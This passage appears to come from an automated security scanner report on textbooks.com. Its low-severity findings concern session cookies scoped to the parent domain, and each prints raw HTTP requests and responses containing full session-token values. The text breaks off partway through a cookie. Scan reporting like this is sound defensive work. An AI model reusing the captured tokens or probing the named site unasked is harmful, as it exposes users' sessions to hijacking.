Set-Cookie: TBSESSION=tDL1W8D7gaCS7jzI6Dzjj4VxTEZdKx54wiBKsRJp2y62pibSI8t34OV5LbMNc5J%2BIDh%2F7cXjxIkPCea1HFWQwg4kkvAf5y%2FWIMqnMEOYq5gwfo0nT%2Br3%2B0Mr2U51pNHYBL7L00QV1Pks3Wo83iqXa%2B7yPEmc%2B%2Flgv%2FadwiXTLDJFUr0vnlwokBSjUmrzJgmZryaXHiFLddpXygKYaW023Yg9OSvJi7Hu%2FMNV1OmaPldRr8NvAwN2D0XT49iDMa%2Bf2xtP6Spo7VHCWA6XYz7ITxlt3GaGxxIIo5tXwc5OpTrHqXKdZAdne2jrWU0C9uquUNG68ReG4eYsffCNTtp0n5TG45l11y3WH%2BJEt7bU0WSXGGXcsMXGGjMQO%2BiGd9q7M5Qz3rCO1ddl2dPVIFEGnDI46PKJPARVjZ7nWLgO03rHvHQgwDOpESSmNx6s2uOMe2EUAO%2BEOFsW5KXx7reamIunceN4S%2BcnJTYQ0FH2ipMMSxfFpIidrjTV8mmp0bf7jLgecSzagN1fHJx5fRhv%2BmeNxmxBvAKYx1W3Lrr2iwld3q2%2Fci%2FPFnpICPJNUU22bWGkl8z%2FohGLs8oosTpgzAmuYGE3dpvbdIDYNBpsBJYY8%2Bl%2Bfi0gbtnbrbxa1vAkZh04aZMtNdXM8EfztGRlpwB%2B5UN1%2BleUU7v%2FnRvQHz9N48UQiOFcB5WQ3y9rxlRU8erTcckrQ2ok7D4S4tulcBOAuNzSkUak48NLzAEQubR%2BSlReGPs0OFk3ga0Ak8Ie75nTGmuPNwq7iuUuzO1hlxPJkrpdQ%2Be9cdGQRwnrskQvh2JvhGmyj3xPJ7IMFxhV%2Ftdv%2BKn62YFQ50%2FVDLanFjHYkhhICDrnx1gf0b%2F14Sh0tZPSmceYUkEjlZreJ3mdp80vc8jooDDhCSXpeJO0OUyhzaXX%2FrptrGcvsef07pvCuUku%2FuJZxotQmum0fs7Lpsg3%2FTiPv0lEeieSUA%2FFMlJxy%2BiCrl4cD23thJbSkwqHTKthbb9oXiViEvHpLerRSsI4XSIuUWaE2IUurstFcJkUY7ng4MGWzRUSDioyeDe3MFN0qlXJxlPhOgjHsM%2BeLri8m%2BBvkXPnMsnozg7j6h1J0BVLRtD7kvlRtQpJ76xS1r0GGMb4cmhZcd%2BrrvLN8CK%2FXqu6P6aQt6T9m7DlM68gUlh%2FR1uSHpCMBltVrtitvz4kN95S8TT9BFfJEEnu%2FnImW0wLUwiQRhHxs20WtHAuk4vQoQYH4MjtdFs3sQVmMcQ3T8UDSK2r2JU%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=0COxkJ9ZgoIrUuXJTYo%3D; expires=Mon, 26-Dec-2011 13:53:02 GMT; path=/; domain=.textbooks.com
Content-Length: 35930


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.5. http://www.textbooks.com/Cart.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Cart.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Cart.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:51:57 GMT
Content-Length: 25374
Connection: close
Set-Cookie: TBSESSION=1pesYoGAQove8asXg%2FLQi3Odk%2FALvaMYWu4u5JdrXTswRUYUKJvQ7xvzZDAfEgGZUlgQdk0f2GecdTZ4qhGUXZ0yT3xlVp3q%2BMehNWH1ykufc%2BUXdB3NVfdJrrjBDK8gumhqKLWu0AnbdX5fvbqtoQjunBi75eZszh1B7jF6RpGjFzW%2FNuQqdz2nzK0VFeUkFOtMW95SAVCwyyverIx0vCc9sE%2BC6dFtzuJ2AH624CJYm8cPTMeM0L%2B6WDvSzbNQJIYrc0pCKK6mSWoArebTZiGaIOpXIf3AtesREiYJRduH1CUhC3mMZWjnPPGKgLkRJdbQLTZw1sZ7XT2aZCMkGa3ru5%2FagVViWzzbpVRxz%2FgKx7QSWWbAGBRHVhNtmnVpxVB3gwMjKydAeKz2mzXmakCZnc4XzhAnvipACD6WTEgoNZ%2FbV5n%2BWrkaPUnY02ky7ylalmqoOcyNbCApYgIvT1h5ATGTLViVs3A4Nxsv7T%2FLMELKk0XheRpXRtLixaAlRyVESWhMQqVk3NALmjFRs90VKA2rh3UFDYhO4e1NrU2%2Bi1mPTJeGYCrWhn2n8MlWUJgr62VVmrWzAWjobClto930h9w7p2W2gdHmydwE92UJMgUJdgIXK9tW3WK6u5anDGcM21gakIejWSQX0ziA8yOuynqIz5zNX4eZcZ%2FAVB3qJomp23e5A8Bq9W1GhI4EPhI3P92ddZL7zzWteX5IDod8B1KeMXNBbl8b4mhv7USPcWWdEiN7ZS9GeuomkLCMhlL0t0dS%2FQoJZAcOihkYy8Bh0Nb94Ar6S0hqAJMe4dmtIdqUITjELDtLPcmlnT%2BAQ04mgLrjehopCBnaiiJh1du7AHiopQapjoXiBm2N47DxuhFiZoagJcXo8P%2BtzRC8sCJjE1cXBPdnaAaxmkoOuuIqWLVV5w6dmg0GPNXOZM9F0X0vnhLmmom343SLzQyKw2QZUQt0mXnbfYPnQFpVNp%2BLxYCo%2FcE5oeGmLUkcpb%2B0Q2KBD5UMGw%2Bjb6ZYk0aojaqDdriVkm2IFGMy1Oy0gRoshgDlx2C%2BWtaKoQStdj4FFACl2chT6cW0ouSCrUX5PBzyp9cF9csPIOqFYV3vvXKHHkkjkAPHQ66Te0TdZi6FQy1j17BXSBQWewkrg9jE9yJtidLhlgOuW0RXxm0vxtxyk5MuiBkZ23izbuw7yqvEbGfnmCfVWKeYcNlE3m7jbAJH420GPadN%2FNAKWG05sDaKuyNbdl7uGyqOJO7ewKXblbDdrq%2BuxmgEj3E%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=KMxvh%2F01XScLHyvOudc%3D; expires=Mon, 26-Dec-2011 13:51:57 GMT; path=/; domain=.textbooks.com


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.6. http://www.textbooks.com/Catalog/A/Agriculture-and-Animal-Sciences.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/A/Agriculture-and-Animal-Sciences.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/A/Agriculture-and-Animal-Sciences.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=IyVuCqYuAWRptohxdfBhEwi0m%2ByBINgd5n6P0FIbcFqpmFLzV1mhy69WGBLhGH%2BRENyUVFCGInw8HUIU%2Bg6OUg9hFzrlYo5Ammn1QoPOILU4kXdaracKHVPT%2BOYr9m8C2B6R6%2FaQpqtkkdxkqR%2BRRU1G02%2BCZE0ZG5hSK9jsRP%2FsnDBjxsu%2BEhDjZzUjdSVwbHDxjHoevpr6GIUVRo163cSyh6jISraIqhEni5kZMH1iX2dujVQfo5VHnyQoSHbpspzTsHqouDJhpr3dlNJB1GcwDlfyR4Jm4cWvzinzcPwnAQ5Tj8w6HY7dJOacd%2F9qhZuo27w3FDBOZDEeuilokoiSW1YRYGr1EXuNON%2BGcUXLGQwYJ%2BqvFrFQAVI%2F2fWEgN58JlrncGg6Lsty%2BuoSxFPiVE05XwurJJ%2BEaX5zfXcbvFJrJglFGYDd5VmMTdqZJsf%2BcaGfP72PjXsIjPv0kLLQBLpT%2B%2BZ%2Bryn9DzDahPy%2FrrMy91jFH5Ig4Sv7mF%2FmoxYrK6UkRz3yQMcAVStWgfp1ULZ92IDOZYwXaNqn5hRgxCYQRfRpyx9Sw6%2Bp1K%2FBISiRto15j5ewiXjKtCKFbgeRCXksJ3rq7w3%2B2%2Bug2tAyWuZkbxdZ8kh4SsHHv1pfieN%2BtkTG0kd19Qg2S2%2F%2BpQm%2BSauQ0KCRThiA6hzkd%2FMl7%2FNxK6pWI6kVjuun96kA6gcfTE7aw1xxY48ZOsxWfSffkqXL9ohW%2B%2B8CB%2F%2FBYup3v1fwHsF54WRA0V7wxRr7rrwl8JQ%2FR0dG17xDyn%2FI4VWEXCroQYsQqV%2BXkFdpCGYOONkbdJTCXpzh5Pr0%2BDQ3MOmKG7uR%2BEmpDjO6mP1%2Bp7keOPZFGYjDb1ACSBvYBbWUYmvI6fhOIZJAZCx49nVBiKS9JG5H4FRZPFw9iwh5%2FABth0gvtxBeU52MdVkNc2x%2B%2BjpWxxwHsI3pdabQM79nqHP0VZn36dNnyCWF10rkOpKnzdwBKwAcuMMqtywxHUejZeF2BQ%2BCfS9gJKL7VSkwEEpNko2I6qIdKCi5oSbUDcOr26DJ7INnKnuTqbR%2B5xOA0cRFdiV7QjxacrFzAILYLRww7vI7ljvxXqGfUmV6ZJk8Bu1ZqbHBB%2BoQFNdluxujPmVG6AClGRGImYFqDom7TovsCaSlGu%2BBlqxtsgGv5wNOUD23TwizdTImIrrgTYMAPvIp%2F62v%2BgVUpd2RVqgqDqOUZHZdeLhOpTHZ%2Bo8NW7nDo3cuReUYCCRnU1x0zJiKQUVP%2FqTIeVQ6aek%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=5lanJ%2BfFuYAsp73%2FIYk%3D; expires=Mon, 26-Dec-2011 13:52:01 GMT; path=/; domain=.textbooks.com
Content-Length: 132548


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.7. http://www.textbooks.com/Catalog/B/Business-and-Economics.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/B/Business-and-Economics.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/B/Business-and-Economics.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:08 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=yLw4NO06c6Ga7KUhlK5wiP992BOqjFKWOhemXEGhBc6V5AGLwU8DWmOwL2UoJzpcQNxL%2F5haD9piZhrh2Q1uaWUTwfZn93cBIL4bgpGL3t%2B%2FvFzFkMPADykRoFsjYiz7EgOqlMOUTgHREi2i7SwIWdU7Em6XFwzgeQlJ8Ys8M3AiesvsRvufPDd4EWa1lHTTRJ9NbRq2lJ5wMP0GIrLyJc0mnDfPRYY%2Fe1RDdHvzuoIXOXUhisbL2H7RvO7st4N1Cxs%2BGOPAwso4h9e28UUnqRADqKNKw%2FBqQKlVtPkBRfltVsXOaDHWE5LMK7S8y5bR6cRhuCb8aBb5kAX3tLNw4O3wNKgM2aPkr%2FD52c13ZdKXwf0s4hpRQlLzdLrT53vaaZ%2F3I4cuWw9X9hn6xwWxrKLS%2F2Elk28ccN6mZ1RTAGMczm2ArnzVfmfZUKGYYGsYVF00i1bnzMtzZQ8TEW0iZju4PT4qx%2BL37rqgOhFNT3g7OrXtVDDWQBLY4prxY10sRwKWpP7Uo9TMspLZTAZLS9Nbg7AtlVq5hFEHqwhEKbwN00o%2FvB%2FnfDrCLv2NaZIw3KfAiA%2FwsFe8Y4EHiSlp46tiZiG2O7r271jW95pqfqm5jkBhWpv2DFCowX%2BZ5uwsWtM2HdGDt0nhNMLsqzoSAkNBg01jRa%2FCM7lfvqAzsU62F2UdeQZkAYEONskjmPviQK9oRRvsBRvuZTET0dj2iuumIMnuZk0fKZDCU5AwPUyGnIyeHwOtj9mEL53hUUS47nbP0FwmxRshcQG5N6kV%2B7WSibTCG1gRKaWIAwgfMBiPx%2FhbnbA%2B0i%2B6M%2FbQimIf1oLeVvNvMATITrwxNhLr1zZLvDoAFrB83lJzm%2BR5xCx2w8V0PTZQKCsF%2F9VzZmCBCPmh35EWoiE5WBEgSWCIdw6oqwb24yEPnuwGC7YBUeXy83gW1NlGTcv6X8NrKQJPB8aeLwKghDVnjpJme1%2FmxDZAZHtZn8PeCJ39LCPqRMI4lxwhJHxpEuV%2BLpHNlbv%2BjWk%2FROHyImna5RNnYFWgkKAd9U%2F3zuqN0p5%2B5mhePHCZcsmd5rU1fs%2BADbu0wuiiR7AMNit3NSZNW5V46XGCHVnVKDUwhgchZ%2FAYr1U%2BR37uOI3nO8vqMlWcqmD7c%2F2MIYmmezSAGvCRI6tj7swTXEioQMDEQuZ6ndNCFPuKtaRL0gNyqSUfDnVTxkbOulYihWyRjAaIDNt85QZwkoaT5PGiGabeP%2FSoKFfxKp%2FxdUf5VaQmEF4UjE0%2FJ%2Fk%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=Po61YNkCwF%2Borj5Wwmo%3D; expires=Mon, 26-Dec-2011 13:52:08 GMT; path=/; domain=.textbooks.com
Content-Length: 100118


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.8. http://www.textbooks.com/Catalog/C/Communication-and-Media.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/C/Communication-and-Media.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/C/Communication-and-Media.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=GflvJakRFJaZHar64sgfpixyIJizFExoPvfubgEHX74mYNU9eYfkv2DS85usjXepowH7reKOL%2BzuU3joe9lQtqX5NQlUHVGyTiem7A03mPnPgmg3KMEU6EzBsoaym9p2wfAUdQtkAY%2BhrpqX5Oxliu9VLNMVseOUaRftoQ%2FSlTCuRYK5hNVeDGGW9nd0pgUPotohkcrUveC085TRLxGNs8FcPElxfraVMuyracMhCpfrxeYg7KSDOzjBOMT%2BIQlW%2FwYIo8o3zGO2CNXIp4JQFijjBjEYTe0CbgfPZomv6QWWdNgdJf%2BxPuLFPH5mdkOE5mEdaZ%2FBSctcu21fqkZPBLkAd6tpM4fR5B9pKhsJM24yxnXvtMHlIJwxObKX912Wx8xcgOn6VmtRdrZUYDyKuENQQDyqwjXIa9D3JVdhUn%2BzflRaRo8s0ZP359TMfNN9k7oPCiS74%2B72KcLoW59DsNpQ3E0ATOUbp32lHoFOUq5LnNgJZbuQ3b8SZFymlG84sgEmaaqG1iMncLSqLlDxJB717qYuTWhD%2BVDgpY9gaK2NLogL4SI8%2FbJQDRVFjytQGdliajuLFgZLG5%2ByeXRRVaq6Db7w%2B6i4EgdIpIFZBs5BDNPLMTpHNwU3Cs8lhxE0vhX6YWX56fFr7mnBBmcbjhLgkHsJbsgJ5keVXHcIl0ELQK08WDby19mFIQjqaSVeb11QKD8ow27Bl1%2B1wH6O%2FOSlWDknFM4OfqtKpdUNq6kAyT%2Bld%2FTcyCWHrTpZNct6knZUXJh7Yk8S9bW3saCm0nJw%2Bh6D9mYO8UEtEzLM9VBmZmpVLZb7RIzez9kOlae9Hs%2B4PRlybJf8qtmqgfVzEjvt2z3sjH6bMoTiBlI0YoH5N6u7eux927Er64xNz2Od23ubQbsIWoh6kSPyhm104Vl06jjvMnsZo3%2BheDsiKiPKGx1Q7fmf98TH%2FVKzM%2BM6KOMbeR